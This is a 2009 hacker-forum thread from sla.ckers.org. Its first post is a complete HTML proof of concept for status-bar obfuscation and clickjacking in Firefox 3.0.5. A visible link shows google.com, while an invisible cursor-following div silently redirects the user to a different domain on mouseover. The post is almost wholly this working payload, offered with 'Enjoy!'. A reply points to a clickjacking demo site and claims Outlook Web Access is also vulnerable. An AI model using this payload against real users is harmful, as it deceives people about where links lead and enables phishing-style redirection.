Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
Posted by: transitt
Date: January 26, 2009 10:59PM

Enjoy!

*Transit
__________

<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.tranXX.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Status Bar Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">By MrDoug</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Note this...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>

Options: ReplyQuote
Re: Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
Posted by: Bullet
Date: February 01, 2010 12:29AM

There is Online ClickJacking Demo. You can test your website to see if it's vulnerable to ClickJacking, you just need to type the URL/IP.

http://narkolayev-shlomi.blogspot.com/2010/01/clickjacking-facebook.html

BTW, OWA also vulnerable to CJ, enjoy ;-)



Edited 1 time(s). Last edit at 02/01/2010 12:45AM by Bullet.

Options: ReplyQuote


Sorry, only registered users may post in this forum.